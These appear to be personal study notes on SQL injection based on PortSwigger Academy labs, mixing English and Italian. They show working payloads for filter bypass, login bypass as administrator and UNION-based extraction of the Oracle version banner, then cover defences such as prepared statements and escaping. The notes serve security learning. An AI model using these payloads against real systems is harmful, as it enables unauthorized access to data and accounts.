SQLinjection

• Portswigger academy
• Portswigger academy SQL union injection
• Portswigger SQL injection Cheat Sheet

Attacco §

Beginner §

If we have a query like this:

SELECT * FROM products WHERE category = Gifts and released = 1

We can get products that aren’t released yet ( released=0 ) through this injection:

https://insecure-website/filter?category=Gifts'--

Let’s break it down

• -- it’s a SQL comment
• ' probrably close something

The previous query becomes:

SELECT * FROM products WHERE category = Gifts-- and released = 1

You can obtain every item with this injection:

https://insecure-website/filter?category=Gifts'+OR+1=1--

The previous query then becomes:

SELECT * FROM products WHERE category = Gifts OR 1=1-- and released = 1

Therefore, this could be exploited in a Login (with unsafe authentication)

SELECT * FROM users WHERE username = 'username' AND password = 'password'

The query becomes:

SELECT * FROM users where username = 'administrator'-- AND password = 'password'

Union Attacks §

Supponiamo di voler risolvere questo lab To solve this lab, you need to perform a SQL injection attack using “UNION SELECT”.

1. The first step is to figure out how many columns are returned by the original query. This is crucial because we need to provide the same number of parameters in our “UNION SELECT” query. Read more here.

This method is more intuitive for me

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
-- and so on until you get a response

But, in this lab we need to use the other one

' ORDER BY 1--;
' ORDER BY 2--;
-- and so on until you get an error

2. Now we can begin to build a payload, but first let’s try:

' UNION SELECT 'abc','efg' FROM DUAL--

It should return something and not an error.

3. The actual payload

' UNION SELECT banner,NULL FROM v$version--

SQL Injection Prevention §

• Use Parameterized Query or PreparedStatement over dynamic SQL query.
• Note that using parameterized query doesn’t prevent cross-site scripting like injecting JavaScript code inside input data
• 📖 OWASP Java Security Cheat Sheet
• 📖 OWASP SQL Injection Prevention Cheat Sheet

Quote

Most developers and security engineers don’t even know how does a parameterized query works.

• 33033576

String query = "SELECT * FROM products WHERE category = '"+ input + "'";

Statement statement = connection.createStatement();
ResultSet resultSet = statement.executeQuery(query);

This code can be easily rewritten in a way that prevents the user input from interfering with the query structure:

PreparedStatement statement = connection.prepareStatement("SELECT * FROM products WHERE category = ?");
    
statement.setString(1, input);
ResultSet resultSet = statement.executeQuery();

Escaping all User-supplied input §

• Only for legacy application that can’t migrate for some reason either to ORM (es [[../../Software Engineering/Web Development/Backend/Java/Java 11/Java Persistance API e Hibernate|Java Persistance API e Hibernate|Hibernate]] ) or parameterized queries
• This technique is to escape user input before putting it into a query
• It is a very database specific in it’s implementation.
• Each DBMS supports one or more character escaping schemes specific to certain kinds of queries

Input Validation §

• Another layer of defense is Input Validation